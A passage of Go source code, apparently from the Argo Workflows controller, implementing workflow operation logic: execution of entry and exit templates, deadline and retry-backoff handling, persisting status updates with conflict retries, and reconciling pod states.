// parallelism
activePods int64
// workflowDeadline is the deadline which the workflow is expected to complete before we
// terminate the workflow.
workflowDeadline *time.Time
eventRecorder record.EventRecorder
// preExecutionNodePhases contains the phases of all the nodes before the current operation. Necessary to infer
// changes in phase for metric emission
preExecutionNodePhases map[string]wfv1.NodePhase
// execWf holds the Workflow for use in execution.
// In Normal workflow scenario: It holds copy of workflow object
// In Submit From WorkflowTemplate: It holds merged workflow with WorkflowDefault, Workflow and WorkflowTemplate
// 'execWf.Spec' should usually be used instead of `wf.Spec`
execWf *wfv1.Workflow
}
var (
// ErrDeadlineExceeded indicates the operation exceeded its deadline for execution
ErrDeadlineExceeded = errors.New(errors.CodeTimeout, "Deadline exceeded")
// ErrParallelismReached indicates this workflow reached its parallelism limit
ErrParallelismReached = errors.New(errors.CodeForbidden, "Max parallelism reached")
ErrResourceRateLimitReached = errors.New(errors.CodeForbidden, "resource creation rate-limit reached")
// ErrTimeout indicates a specific template timed out
ErrTimeout = errors.New(errors.CodeTimeout, "timeout")
)
// maxOperationTime is the maximum time a workflow operation is allowed to run
// for before requeuing the workflow onto the workqueue.
var (
maxOperationTime = envutil.LookupEnvDurationOr("MAX_OPERATION_TIME", 30*time.Second)
)
// failedNodeStatus is a subset of NodeStatus that is only used to Marshal certain fields into a JSON of failed nodes
type failedNodeStatus struct {
DisplayName string `json:"displayName"`
Message string `json:"message"`
TemplateName string `json:"templateName"`
Phase string `json:"phase"`
PodName string `json:"podName"`
FinishedAt metav1.Time `json:"finishedAt"`
}
// newWorkflowOperationCtx creates and initializes a new wfOperationCtx object.
func newWorkflowOperationCtx(wf *wfv1.Workflow, wfc *WorkflowController) *wfOperationCtx {
// NEVER modify objects from the store. It's a read-only, local cache.
// You can use DeepCopy() to make a deep copy of original object and modify this copy
// Or create a copy manually for better performance
wfCopy := wf.DeepCopyObject().(*wfv1.Workflow)
woc := wfOperationCtx{
wf: wfCopy,
orig: wf,
execWf: wfCopy,
updated: false,
log: log.WithFields(log.Fields{
"workflow": wf.ObjectMeta.Name,
"namespace": wf.ObjectMeta.Namespace,
}),
controller: wfc,
globalParams: make(map[string]string),
volumes: wf.Spec.DeepCopy().Volumes,
completedPods: make(map[string]apiv1.PodPhase),
deadline: time.Now().UTC().Add(maxOperationTime),
eventRecorder: wfc.eventRecorderManager.Get(wf.Namespace),
preExecutionNodePhases: make(map[string]wfv1.NodePhase),
}
if woc.wf.Status.Nodes == nil {
woc.wf.Status.Nodes = make(map[string]wfv1.NodeStatus)
}
if woc.wf.Status.StoredTemplates == nil {
woc.wf.Status.StoredTemplates = make(map[string]wfv1.Template)
}
return &woc
}
// operate is the main operator logic of a workflow. It evaluates the current state of the workflow,
// and its pods and decides how to proceed down the execution path.
// TODO: an error returned by this method should result in requeuing the workflow to be retried at a
// later time
// As you must not call `persistUpdates` twice, you must not call `operate` twice.
func (woc *wfOperationCtx) operate(ctx context.Context) {
defer func() {
if woc.wf.Status.Fulfilled() {
_ = woc.killDaemonedChildren(ctx, "")
}
woc.persistUpdates(ctx)
}()
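// Deferred functions run in LIFO order, so the recover() handler below executes before the
// persistUpdates defer above; a panic is therefore recorded on the workflow before it is persisted.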
defer func() {
if r := recover(); r != nil {
woc.log.WithFields(log.Fields{"stack": string(debug.Stack()), "r": r}).Errorf("Recovered from panic")
if rerr, ok := r.(error); ok {
woc.markWorkflowError(ctx, rerr)
} else {
woc.markWorkflowError(ctx, fmt.Errorf("%v", r))
}
woc.controller.metrics.OperationPanic()
}
}()
woc.log.Infof("Processing workflow")
// Set the Execute workflow spec for execution
// ExecWF is a runtime execution spec merged from Wf, WFT and Wfdefault
err := woc.setExecWorkflow(ctx)
if err != nil {
woc.log.WithError(err).Errorf("Unable to set ExecWorkflow")
return
}
if woc.wf.Status.ArtifactRepositoryRef == nil {
ref, err := woc.controller.artifactRepositories.Resolve(ctx, woc.execWf.Spec.ArtifactRepositoryRef, woc.wf.Namespace)
if err != nil {
woc.markWorkflowError(ctx, fmt.Errorf("failed to resolve artifact repository: %w", err))
return
}
woc.wf.Status.ArtifactRepositoryRef = ref
woc.updated = true
}
repo, err := woc.controller.artifactRepositories.Get(ctx, woc.wf.Status.ArtifactRepositoryRef)
if err != nil {
woc.markWorkflowError(ctx, fmt.Errorf("failed to get artifact repository: %v", err))
return
}
woc.artifactRepository = repo
// Workflow Level Synchronization lock
if woc.execWf.Spec.Synchronization != nil {
acquired, wfUpdate, msg, err := woc.controller.syncManager.TryAcquire(woc.wf, "", woc.execWf.Spec.Synchronization)
if err != nil {
woc.log.Warn("Failed to acquire the lock")
woc.markWorkflowFailed(ctx, fmt.Sprintf("Failed to acquire the synchronization lock. %s", err.Error()))
return
}
woc.updated = wfUpdate
if !acquired {
woc.log.Warn("Workflow processing has been postponed due to concurrency limit")
woc.wf.Status.Message = msg
return
}
}
// Update workflow duration variable
woc.globalParams[common.GlobalVarWorkflowDuration] = fmt.Sprintf("%f", time.Since(woc.wf.Status.StartedAt.Time).Seconds())
// Populate the phase of all the nodes prior to execution
for _, node := range woc.wf.Status.Nodes {
woc.preExecutionNodePhases[node.ID] = node.Phase
}
if woc.wf.Status.Phase == wfv1.WorkflowUnknown {
woc.markWorkflowRunning(ctx)
err := woc.createPDBResource(ctx)
if err != nil {
msg := fmt.Sprintf("Unable to create PDB resource for workflow, %s error: %s", woc.wf.Name, err)
woc.markWorkflowFailed(ctx, msg)
return
}
woc.workflowDeadline = woc.getWorkflowDeadline()
// The workflow will not be requeued while its steps are in a pending state,
// so requeue it at its deadline to make sure the deadline is enforced.
if woc.workflowDeadline != nil {
woc.requeueAfter(time.Until(*woc.workflowDeadline))
}
if woc.execWf.Spec.Metrics != nil {
realTimeScope := map[string]func() float64{common.GlobalVarWorkflowDuration: func() float64 {
return time.Since(woc.wf.Status.StartedAt.Time).Seconds()
}}
woc.computeMetrics(woc.execWf.Spec.Metrics.Prometheus, woc.globalParams, realTimeScope, true)
}
woc.wf.Status.EstimatedDuration = woc.estimateWorkflowDuration()
} else {
woc.workflowDeadline = woc.getWorkflowDeadline()
err := woc.podReconciliation(ctx)
if err == nil {
woc.failSuspendedAndPendingNodesAfterDeadlineOrShutdown()
}
if err != nil {
woc.log.WithError(err).WithField("workflow", woc.wf.ObjectMeta.Name).Error("workflow timeout")
woc.eventRecorder.Event(woc.wf, apiv1.EventTypeWarning, "WorkflowTimedOut", "Workflow timed out")
// TODO: we need to re-add to the workqueue, but should happen in caller
return
}
}
if woc.ShouldSuspend() {
woc.log.Infof("workflow suspended")
return
}
if woc.execWf.Spec.Parallelism != nil {
woc.activePods = woc.getActivePods("")
}
// Create a starting template context.
tmplCtx, err := woc.createTemplateContext(wfv1.ResourceScopeLocal, "")
if err != nil {
woc.log.WithError(err).Error("Failed to create a template context")
woc.markWorkflowError(ctx, err)
return
}
err = woc.substituteParamsInVolumes(woc.globalParams)
if err != nil {
woc.log.WithError(err).Error("volumes global param substitution error")
woc.markWorkflowError(ctx, err)
return
}
err = woc.createPVCs(ctx)
if err != nil {
if errorsutil.IsTransientErr(err) {
// Error was most likely caused by a lack of resources.
// In this case, Workflow will be in pending state and requeue.
woc.markWorkflowPhase(ctx, wfv1.WorkflowPending, fmt.Sprintf("Waiting for a PVC to be created. %v", err))
woc.requeue()
return
}
err = fmt.Errorf("pvc create error: %w", err)
woc.log.WithError(err).Error("pvc create error")
woc.markWorkflowError(ctx, err)
return
} else if woc.wf.Status.Phase == wfv1.WorkflowPending {
// Workflow might be in pending state if previous PVC creation is forbidden
woc.markWorkflowRunning(ctx)
}
node, err := woc.executeTemplate(ctx, woc.wf.ObjectMeta.Name, &wfv1.WorkflowStep{Template: woc.execWf.Spec.Entrypoint}, tmplCtx, woc.execWf.Spec.Arguments, &executeTemplateOpts{})
if err != nil {
woc.log.WithError(err).Error("error in entry template execution")
// we wrap this error up to report a clear message
x := fmt.Errorf("error in entry template execution: %w", err)
switch err {
case ErrDeadlineExceeded:
woc.eventRecorder.Event(woc.wf, apiv1.EventTypeWarning, "WorkflowTimedOut", x.Error())
case ErrParallelismReached:
default:
if !errorsutil.IsTransientErr(err) && !woc.wf.Status.Phase.Completed() && os.Getenv("BUBBLE_ENTRY_TEMPLATE_ERR") != "false" {
woc.markWorkflowError(ctx, x)
}
}
return
}
if node == nil || !node.Fulfilled() {
// node can be nil if a workflow is created immediately in a parallelism == 0 state
return
}
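// Map the entrypoint node's phase to the corresponding overall workflow phase.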
workflowStatus := map[wfv1.NodePhase]wfv1.WorkflowPhase{
wfv1.NodePending: wfv1.WorkflowPending,
wfv1.NodeRunning: wfv1.WorkflowRunning,
wfv1.NodeSucceeded: wfv1.WorkflowSucceeded,
wfv1.NodeSkipped: wfv1.WorkflowSucceeded,
wfv1.NodeFailed: wfv1.WorkflowFailed,
wfv1.NodeError: wfv1.WorkflowError,
wfv1.NodeOmitted: wfv1.WorkflowSucceeded,
}[node.Phase]
var onExitNode *wfv1.NodeStatus
if woc.execWf.Spec.OnExit != "" && woc.GetShutdownStrategy().ShouldExecute(true) {
woc.globalParams[common.GlobalVarWorkflowStatus] = string(workflowStatus)
var failures []failedNodeStatus
for _, node := range woc.wf.Status.Nodes {
if node.Phase == wfv1.NodeFailed || node.Phase == wfv1.NodeError {
failures = append(failures,
failedNodeStatus{
DisplayName: node.DisplayName,
Message: node.Message,
TemplateName: node.TemplateName,
Phase: string(node.Phase),
PodName: node.ID,
FinishedAt: node.FinishedAt,
})
}
}
failedNodeBytes, err := json.Marshal(failures)
if err != nil {
woc.log.Errorf("Error marshalling failed nodes list: %+v", err)
// No need to return here
}
// This strconv.Quote is necessary so that the escaped quotes are not removed during parameter substitution
woc.globalParams[common.GlobalVarWorkflowFailures] = strconv.Quote(string(failedNodeBytes))
woc.log.Infof("Running OnExit handler: %s", woc.execWf.Spec.OnExit)
onExitNodeName := common.GenerateOnExitNodeName(woc.wf.ObjectMeta.Name)
onExitNode, err = woc.executeTemplate(ctx, onExitNodeName, &wfv1.WorkflowStep{Template: woc.execWf.Spec.OnExit}, tmplCtx, woc.execWf.Spec.Arguments, &executeTemplateOpts{onExitTemplate: true})
if err != nil {
woc.log.WithError(err).Error("error in exit template execution")
if !woc.wf.Status.Phase.Completed() {
woc.markWorkflowError(ctx, fmt.Errorf("error in exit template execution: %w", err))
}
return
}
if onExitNode == nil || !onExitNode.Fulfilled() {
return
}
}
var workflowMessage string
if node.FailedOrError() && woc.GetShutdownStrategy().Enabled() {
workflowMessage = fmt.Sprintf("Stopped with strategy '%s'", woc.GetShutdownStrategy())
} else {
workflowMessage = node.Message
}
// If we get here, the workflow completed, all PVCs were deleted successfully, and
// exit handlers were executed. We now need to infer the workflow phase from the
// node phase.
switch workflowStatus {
case wfv1.WorkflowSucceeded:
if onExitNode != nil && onExitNode.FailedOrError() {
// if main workflow succeeded, but the exit node was unsuccessful
// the workflow is now considered unsuccessful.
switch onExitNode.Phase {
case wfv1.NodeFailed:
woc.markWorkflowFailed(ctx, onExitNode.Message)
default:
woc.markWorkflowError(ctx, fmt.Errorf(onExitNode.Message))
}
} else {
woc.markWorkflowSuccess(ctx)
}
case wfv1.WorkflowFailed:
woc.markWorkflowFailed(ctx, workflowMessage)
case wfv1.WorkflowError:
woc.markWorkflowPhase(ctx, wfv1.WorkflowError, workflowMessage)
default:
// NOTE: we should never make it here because if the node was 'Running' we should have
// returned earlier.
err = errors.InternalErrorf("Unexpected node phase %s: %+v", woc.wf.ObjectMeta.Name, err)
woc.markWorkflowError(ctx, err)
}
if woc.execWf.Spec.Metrics != nil {
realTimeScope := map[string]func() float64{common.GlobalVarWorkflowDuration: func() float64 {
return node.FinishedAt.Sub(node.StartedAt.Time).Seconds()
}}
woc.globalParams[common.GlobalVarWorkflowStatus] = string(workflowStatus)
woc.computeMetrics(woc.execWf.Spec.Metrics.Prometheus, woc.globalParams, realTimeScope, false)
}
err = woc.deletePVCs(ctx)
if err != nil {
woc.log.WithError(err).Warn("failed to delete PVCs")
}
}
func (woc *wfOperationCtx) getContainerRuntimeExecutor() string {
return woc.controller.GetContainerRuntimeExecutor(labels.Set(woc.wf.Labels))
}
func (woc *wfOperationCtx) getWorkflowDeadline() *time.Time {
if woc.execWf.Spec.ActiveDeadlineSeconds == nil {
return nil
}
if woc.wf.Status.StartedAt.IsZero() {
return nil
}
startedAt := woc.wf.Status.StartedAt.Truncate(time.Second)
deadline := startedAt.Add(time.Duration(*woc.execWf.Spec.ActiveDeadlineSeconds) * time.Second).UTC()
return &deadline
}
// setGlobalParameters sets the globalParam map with global parameters
func (woc *wfOperationCtx) setGlobalParameters(executionParameters wfv1.Arguments) {
woc.globalParams[common.GlobalVarWorkflowName] = woc.wf.ObjectMeta.Name
woc.globalParams[common.GlobalVarWorkflowNamespace] = woc.wf.ObjectMeta.Namespace
woc.globalParams[common.GlobalVarWorkflowServiceAccountName] = woc.execWf.Spec.ServiceAccountName
woc.globalParams[common.GlobalVarWorkflowUID] = string(woc.wf.ObjectMeta.UID)
woc.globalParams[common.GlobalVarWorkflowCreationTimestamp] = woc.wf.ObjectMeta.CreationTimestamp.Format(time.RFC3339)
if annotation := woc.wf.ObjectMeta.GetAnnotations(); annotation != nil {
val, ok := annotation[common.AnnotationKeyCronWfScheduledTime]
if ok {
woc.globalParams[common.GlobalVarWorkflowCronScheduleTime] = val
}
}
if woc.execWf.Spec.Priority != nil {
woc.globalParams[common.GlobalVarWorkflowPriority] = strconv.Itoa(int(*woc.execWf.Spec.Priority))
}
for char := range strftime.FormatChars {
cTimeVar := fmt.Sprintf("%s.%s", common.GlobalVarWorkflowCreationTimestamp, string(char))
woc.globalParams[cTimeVar] = strftime.Format("%"+string(char), woc.wf.ObjectMeta.CreationTimestamp.Time)
}
woc.globalParams[common.GlobalVarWorkflowCreationTimestamp+".s"] = strconv.FormatInt(woc.wf.ObjectMeta.CreationTimestamp.Time.Unix(), 10)
if workflowParameters, err := json.Marshal(woc.execWf.Spec.Arguments.Parameters); err == nil {
woc.globalParams[common.GlobalVarWorkflowParameters] = string(workflowParameters)
}
for _, param := range executionParameters.Parameters {
woc.globalParams["workflow.parameters."+param.Name] = param.Value.String()
}
for k, v := range woc.wf.ObjectMeta.Annotations {
woc.globalParams["workflow.annotations."+k] = v
}
for k, v := range woc.wf.ObjectMeta.Labels {
woc.globalParams["workflow.labels."+k] = v
}
if woc.wf.Status.Outputs != nil {
for _, param := range woc.wf.Status.Outputs.Parameters {
if param.HasValue() {
woc.globalParams["workflow.outputs.parameters."+param.Name] = param.GetValue()
}
}
}
}
// persistUpdates will update a workflow with any updates made during workflow operation.
// It also labels any pods as completed if we have extracted everything we need from them.
// NOTE: a previous implementation used Patch instead of Update, but Patch does not work with
// the fake CRD clientset which makes unit testing extremely difficult.
func (woc *wfOperationCtx) persistUpdates(ctx context.Context) {
if !woc.updated {
return
}
diff.LogChanges(woc.orig, woc.wf)
resource.UpdateResourceDurations(woc.wf)
progress.UpdateProgress(woc.wf)
// You MUST not call `persistUpdates` twice.
// * It breaks `reapplyUpdate`, which cannot work unless the resource versions differ.
// * It will double the number of Kubernetes API requests.
if woc.orig.ResourceVersion != woc.wf.ResourceVersion {
woc.log.Panic("cannot persist updates with mismatched resource versions")
}
wfClient := woc.controller.wfclientset.ArgoprojV1alpha1().Workflows(woc.wf.ObjectMeta.Namespace)
// try and compress nodes if needed
nodes := woc.wf.Status.Nodes
err := woc.controller.hydrator.Dehydrate(woc.wf)
if err != nil {
woc.log.Warnf("Failed to dehydrate: %v", err)
woc.markWorkflowError(ctx, err)
}
// Release all acquired lock for completed workflow
if woc.wf.Status.Synchronization != nil && woc.wf.Status.Fulfilled() {
if woc.controller.syncManager.ReleaseAll(woc.wf) {
woc.log.WithFields(log.Fields{"key": woc.wf.Name}).Info("Released all acquired locks")
}
}
wf, err := wfClient.Update(ctx, woc.wf, metav1.UpdateOptions{})
if err != nil {
woc.log.Warnf("Error updating workflow: %v %s", err, apierr.ReasonForError(err))
if argokubeerr.IsRequestEntityTooLargeErr(err) {
woc.persistWorkflowSizeLimitErr(ctx, wfClient, err)
return
}
if !apierr.IsConflict(err) {
return
}
woc.log.Info("Re-applying updates on latest version and retrying update")
wf, err := woc.reapplyUpdate(ctx, wfClient, nodes)
if err != nil {
woc.log.Infof("Failed to re-apply update: %+v", err)
return
}
woc.wf = wf
} else {
woc.wf = wf
woc.controller.hydrator.HydrateWithNodes(woc.wf, nodes)
}
// The workflow returned from wfClient.Update doesn't have a TypeMeta associated
// with it, so copy from the original workflow.
woc.wf.TypeMeta = woc.orig.TypeMeta
// Create WorkflowNode* events for nodes that have changed phase
woc.recordNodePhaseChangeEvents(woc.orig.Status.Nodes, woc.wf.Status.Nodes)
if !woc.controller.hydrator.IsHydrated(woc.wf) {
panic("workflow should be hydrated")
}
woc.log.WithFields(log.Fields{"resourceVersion": woc.wf.ResourceVersion, "phase": woc.wf.Status.Phase}).Info("Workflow update successful")
switch os.Getenv("INFORMER_WRITE_BACK") {
// By default we write back (as per v2.11); this does not reduce errors, but it does reduce
// conflicts and therefore we log fewer warning messages.
case "", "true":
if err := woc.writeBackToInformer(); err != nil {
woc.markWorkflowError(ctx, err)
return
}
case "false":
time.Sleep(1 * time.Second)
}
// It is important that we *never* label pods as completed until we successfully updated the workflow
// Failing to do so means we can have inconsistent state.
// TODO: The completedPods may be labeled multiple times; this could be improved in the future.
// Send succeeded or completed pods to the pod cleanup queue so they are deleted later, depending on the PodGCStrategy.
// Note that we do not need to label a pod that will be deleted for GC anyway; doing so may even result in
// errors if the pod was already deleted.
for podName, podPhase := range woc.completedPods {
if woc.execWf.Spec.PodGC != nil {
switch woc.execWf.Spec.PodGC.Strategy {
case wfv1.PodGCOnPodSuccess:
if podPhase == apiv1.PodSucceeded {
woc.controller.queuePodForCleanup(woc.wf.Namespace, podName, deletePod)
}
case wfv1.PodGCOnPodCompletion:
woc.controller.queuePodForCleanup(woc.wf.Namespace, podName, deletePod)
}
} else {
// label pods which will not be deleted
woc.controller.queuePodForCleanup(woc.wf.Namespace, podName, labelPodCompleted)
}
}
}
func (woc *wfOperationCtx) writeBackToInformer() error {
un, err := wfutil.ToUnstructured(woc.wf)
if err != nil {
return fmt.Errorf("failed to convert workflow to unstructured: %w", err)
}
err = woc.controller.wfInformer.GetStore().Update(un)
if err != nil {
return fmt.Errorf("failed to update informer store: %w", err)
}
return nil
}
// persistWorkflowSizeLimitErr will fail the workflow with an error when we hit the resource size limit
// See https://github.com/argoproj/argo-workflows/issues/913
func (woc *wfOperationCtx) persistWorkflowSizeLimitErr(ctx context.Context, wfClient v1alpha1.WorkflowInterface, err error) {
woc.wf = woc.orig.DeepCopy()
woc.markWorkflowError(ctx, err)
_, err = wfClient.Update(ctx, woc.wf, metav1.UpdateOptions{})
if err != nil {
woc.log.Warnf("Error updating workflow with size error: %v", err)
}
}
// reapplyUpdate GETs the latest version of the workflow, re-applies the updates and
// retries the UPDATE multiple times. For reasoning behind this technique, see:
// https://github.com/kubernetes/community/blob/master/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
func (woc *wfOperationCtx) reapplyUpdate(ctx context.Context, wfClient v1alpha1.WorkflowInterface, nodes wfv1.Nodes) (*wfv1.Workflow, error) {
// if this condition is true, then this func will always error
if woc.orig.ResourceVersion != woc.wf.ResourceVersion {
woc.log.Panic("cannot re-apply update with mismatched resource versions")
}
err := woc.controller.hydrator.Hydrate(woc.orig)
if err != nil {
return nil, err
}
// First generate the patch
oldData, err := json.Marshal(woc.orig)
if err != nil {
return nil, err
}
woc.controller.hydrator.HydrateWithNodes(woc.wf, nodes)
newData, err := json.Marshal(woc.wf)
if err != nil {
return nil, err
}
patchBytes, err := jsonpatch.CreateMergePatch(oldData, newData)
if err != nil {
return nil, err
}
// Next get latest version of the workflow, apply the patch and retry the update
attempt := 1
for {
currWf, err := wfClient.Get(ctx, woc.wf.ObjectMeta.Name, metav1.GetOptions{})
if err != nil {
return nil, err
}
// There is something about having informer indexers (introduced in v2.12) that means we are more likely to operate on the
// previous version of the workflow. This means under high load, a previously successful workflow could
// be operated on again. This can error (e.g. if any pod was deleted as part of clean-up). This check prevents that.
// https://github.com/argoproj/argo-workflows/issues/4798
if currWf.Status.Fulfilled() {
return nil, fmt.Errorf("must never update completed workflows")
}
err = woc.controller.hydrator.Hydrate(currWf)
if err != nil {
return nil, err
}
for id, node := range woc.wf.Status.Nodes {
currNode, exists := currWf.Status.Nodes[id]
if exists && currNode.Fulfilled() && node.Phase != currNode.Phase {
return nil, fmt.Errorf("must never update completed node %s", id)
}
}
currWfBytes, err := json.Marshal(currWf)
if err != nil {
return nil, err
}
newWfBytes, err := jsonpatch.MergePatch(currWfBytes, patchBytes)
if err != nil {
return nil, err
}
var newWf wfv1.Workflow
err = json.Unmarshal(newWfBytes, &newWf)
if err != nil {
return nil, err
}
err = woc.controller.hydrator.Dehydrate(&newWf)
if err != nil {
return nil, err
}
wf, err := wfClient.Update(ctx, &newWf, metav1.UpdateOptions{})
if err == nil {
woc.log.Infof("Update retry attempt %d successful", attempt)
woc.controller.hydrator.HydrateWithNodes(wf, nodes)
return wf, nil
}
attempt++
woc.log.Warnf("Update retry attempt %d failed: %v", attempt, err)
if attempt > 5 {
return nil, err
}
}
}
// requeue this workflow onto the workqueue for later processing
func (woc *wfOperationCtx) requeueAfter(afterDuration time.Duration) {
key, _ := cache.MetaNamespaceKeyFunc(woc.wf)
woc.controller.wfQueue.AddAfter(key, afterDuration)
}
func (woc *wfOperationCtx) requeue() {
key, _ := cache.MetaNamespaceKeyFunc(woc.wf)
woc.controller.wfQueue.AddRateLimited(key)
}
// processNodeRetries updates the retry node state based on the child node state and the retry strategy and returns the node.
func (woc *wfOperationCtx) processNodeRetries(node *wfv1.NodeStatus, retryStrategy wfv1.RetryStrategy, opts *executeTemplateOpts) (*wfv1.NodeStatus, bool, error) {
if node.Fulfilled() {
return node, true, nil
}
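// Index -1 selects the most recently created child, i.e. the latest retry attempt.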
lastChildNode := getChildNodeIndex(node, woc.wf.Status.Nodes, -1)
if lastChildNode == nil {
return node, true, nil
}
if !lastChildNode.Fulfilled() {
// last child node is still running.
return node, true, nil
}
if !lastChildNode.FailedOrError() {
node.Outputs = lastChildNode.Outputs.DeepCopy()
woc.wf.Status.Nodes[node.ID] = *node
return woc.markNodePhase(node.Name, wfv1.NodeSucceeded), true, nil
}
if woc.GetShutdownStrategy().Enabled() || (woc.workflowDeadline != nil && time.Now().UTC().After(*woc.workflowDeadline)) {
var message string
if woc.GetShutdownStrategy().Enabled() {
message = fmt.Sprintf("Stopped with strategy '%s'", woc.GetShutdownStrategy())
} else {
message = fmt.Sprintf("retry exceeded workflow deadline %s", *woc.workflowDeadline)
}
woc.log.Infoln(message)
return woc.markNodePhase(node.Name, lastChildNode.Phase, message), true, nil
}
if retryStrategy.Backoff != nil {
maxDurationDeadline := time.Time{}
// Process max duration limit
if retryStrategy.Backoff.MaxDuration != "" && len(node.Children) > 0 {
maxDuration, err := parseStringToDuration(retryStrategy.Backoff.MaxDuration)
if err != nil {
return nil, false, err
}
firstChildNode := getChildNodeIndex(node, woc.wf.Status.Nodes, 0)
maxDurationDeadline = firstChildNode.StartedAt.Add(maxDuration)
if time.Now().After(maxDurationDeadline) {
woc.log.Infoln("Max duration limit exceeded. Failing...")
return woc.markNodePhase(node.Name, lastChildNode.Phase, "Max duration limit exceeded"), true, nil
}
}
// Max duration limit hasn't been exceeded, process back off
if retryStrategy.Backoff.Duration == "" {
return nil, false, fmt.Errorf("no base duration specified for retryStrategy")
}
baseDuration, err := parseStringToDuration(retryStrategy.Backoff.Duration)
if err != nil {
return nil, false, err
}
timeToWait := baseDuration
retryStrategyBackoffFactor, err := intstr.Int32(retryStrategy.Backoff.Factor)
if err != nil {
return nil, false, err
}
if retryStrategyBackoffFactor != nil && *retryStrategyBackoffFactor > 0 {
// Formula: timeToWait = duration * factor^retry_number
// Note that timeToWait should equal the duration for the first retry attempt.
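// For example (illustrative values): with Duration "1m" and Factor 2, the waits after the
// 1st, 2nd and 3rd failed attempts are 1m, 2m and 4m respectively.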
timeToWait = baseDuration * time.Duration(math.Pow(float64(*retryStrategyBackoffFactor), float64(len(node.Children)-1)))
}
waitingDeadline := lastChildNode.FinishedAt.Add(timeToWait)
// If the waiting deadline is after the max duration deadline, then it's futile to wait until then. Stop early
if !maxDurationDeadline.IsZero() && waitingDeadline.After(maxDurationDeadline) {
woc.log.Infoln("Backoff would exceed max duration limit. Failing...")
return woc.markNodePhase(node.Name, lastChildNode.Phase, "Backoff would exceed max duration limit"), true, nil
}
// See if we have waited past the deadline
if time.Now().Before(waitingDeadline) {
woc.requeueAfter(timeToWait)
retryMessage := fmt.Sprintf("Backoff for %s", humanize.Duration(timeToWait))
return woc.markNodePhase(node.Name, node.Phase, retryMessage), false, nil
}
woc.log.WithField("node", node.Name).Infof("node has maxDuration set, setting executionDeadline to: %s", humanize.Timestamp(maxDurationDeadline))
opts.executionDeadline = maxDurationDeadline
node = woc.markNodePhase(node.Name, node.Phase, "")
}
var retryOnFailed bool
var retryOnError bool
switch retryStrategy.RetryPolicy {
case wfv1.RetryPolicyAlways:
retryOnFailed = true
retryOnError = true
case wfv1.RetryPolicyOnError:
retryOnFailed = false
retryOnError = true
case wfv1.RetryPolicyOnTransientError:
if (lastChildNode.Phase == wfv1.NodeFailed || lastChildNode.Phase == wfv1.NodeError) && errorsutil.IsTransientErr(errors.InternalError(lastChildNode.Message)) {
retryOnFailed = true
retryOnError = true
}
case wfv1.RetryPolicyOnFailure, "":
retryOnFailed = true
retryOnError = false
default:
return nil, false, fmt.Errorf("%s is not a valid RetryPolicy", retryStrategy.RetryPolicy)
}
if (lastChildNode.Phase == wfv1.NodeFailed && !retryOnFailed) || (lastChildNode.Phase == wfv1.NodeError && !retryOnError) {
woc.log.Infof("Node not set to be retried after status: %s", lastChildNode.Phase)
return woc.markNodePhase(node.Name, lastChildNode.Phase, lastChildNode.Message), true, nil
}
if !lastChildNode.CanRetry() {
woc.log.Infof("Node cannot be retried. Marking it failed")
return woc.markNodePhase(node.Name, lastChildNode.Phase, lastChildNode.Message), true, nil
}
limit, err := intstr.Int32(retryStrategy.Limit)
if err != nil {
return nil, false, err
}
if retryStrategy.Limit != nil && limit != nil && int32(len(node.Children)) > *limit {
woc.log.Infoln("No more retries left. Failing...")
return woc.markNodePhase(node.Name, lastChildNode.Phase, "No more retries left"), true, nil
}
woc.log.Infof("%d child nodes of %s failed. Trying again...", len(node.Children), node.Name)
return node, true, nil
}
// podReconciliation is the process by which a workflow will examine all its related
// pods and update the node state before continuing the evaluation of the workflow.
// Records all pods which were observed completed, which will be labeled completed=true
// after successful persist of the workflow.
func (woc *wfOperationCtx) podReconciliation(ctx context.Context) error {
podList, err := woc.getAllWorkflowPods()
if err != nil {
return err
}
seenPods := make(map[string]*apiv1.Pod)
seenPodLock := &sync.Mutex{}
wfNodesLock := &sync.RWMutex{}
podRunningCondition := wfv1.Condition{Type: wfv1.ConditionTypePodRunning, Status: metav1.ConditionFalse}
performAssessment := func(pod *apiv1.Pod) {
if pod == nil {
return
}
nodeNameForPod := pod.Annotations[common.AnnotationKeyNodeName]
nodeID := woc.wf.NodeID(nodeNameForPod)
seenPodLock.Lock()
seenPods[nodeID] = pod
seenPodLock.Unlock()
wfNodesLock.Lock()
defer wfNodesLock.Unlock()
if node, ok := woc.wf.Status.Nodes[nodeID]; ok {
if newState := woc.assessNodeStatus(pod, &node); newState != nil {
woc.wf.Status.Nodes[nodeID] = *newState
woc.addOutputsToGlobalScope(node.Outputs)
if node.MemoizationStatus != nil {
if node.Succeeded() {
c := woc.controller.cacheFactory.GetCache(controllercache.ConfigMapCache, node.MemoizationStatus.CacheName)
err := c.Save(ctx, node.MemoizationStatus.Key, node.ID, node.Outputs)
if err != nil {
woc.log.WithFields(log.Fields{"nodeID": node.ID}).WithError(err).Error("Failed to save node outputs to cache")
node.Phase = wfv1.NodeError
}
}
}
if node.Phase == wfv1.NodeRunning {
podRunningCondition.Status = metav1.ConditionTrue
}
woc.updated = true
}
node := woc.wf.Status.Nodes[pod.ObjectMeta.Name]
match := true
if woc.execWf.Spec.PodGC.GetLabelSelector() != nil {
var podLabels labels.Set = pod.GetLabels()
match, err = woc.execWf.Spec.PodGC.Matches(podLabels)
if err != nil {
woc.markWorkflowFailed(ctx, fmt.Sprintf("failed to parse label selector %s for pod GC: %v", woc.execWf.Spec.PodGC.LabelSelector, err))
return
}
}
if node.Fulfilled() && !node.IsDaemoned() {
if pod.GetLabels()[common.LabelKeyCompleted] == "true" {
return
}
if match {
woc.completedPods[pod.Name] = pod.Status.Phase
}
if woc.shouldPrintPodSpec(node) {
printPodSpecLog(pod, woc.wf.Name)
}
}
if node.Succeeded() && match {
woc.completedPods[pod.Name] = pod.Status.Phase
}
}
}
parallelPodNum := make(chan string, 500)
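// The buffered channel acts as a semaphore, bounding pod assessment to at most 500 concurrent goroutines.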
var wg sync.WaitGroup
for _, pod := range podList {
parallelPodNum <- pod.Name
wg.Add(1)
go func(pod *apiv1.Pod) {
defer wg.Done()
performAssessment(pod)
err = woc.applyExecutionControl(ctx, pod, wfNodesLock)
if err != nil {
woc.log.Warnf("Failed to apply execution control to pod %s", pod.Name)
}
<-parallelPodNum
}(pod)
}
wg.Wait()
woc.wf.Status.Conditions.UpsertCondition(podRunningCondition)
// Now check for deleted pods. Iterate our nodes. If any one of our nodes does not show up in
// the seen list, it implies that the pod was deleted without the controller seeing the event.
// It is now impossible to infer the pod status. All we can do at this point is mark the node
// with Error, or re-submit it.
for nodeID, node := range woc.wf.Status.Nodes {
if node.Type != wfv1.NodeTypePod || node.Phase.Fulfilled() || node.StartedAt.IsZero() {
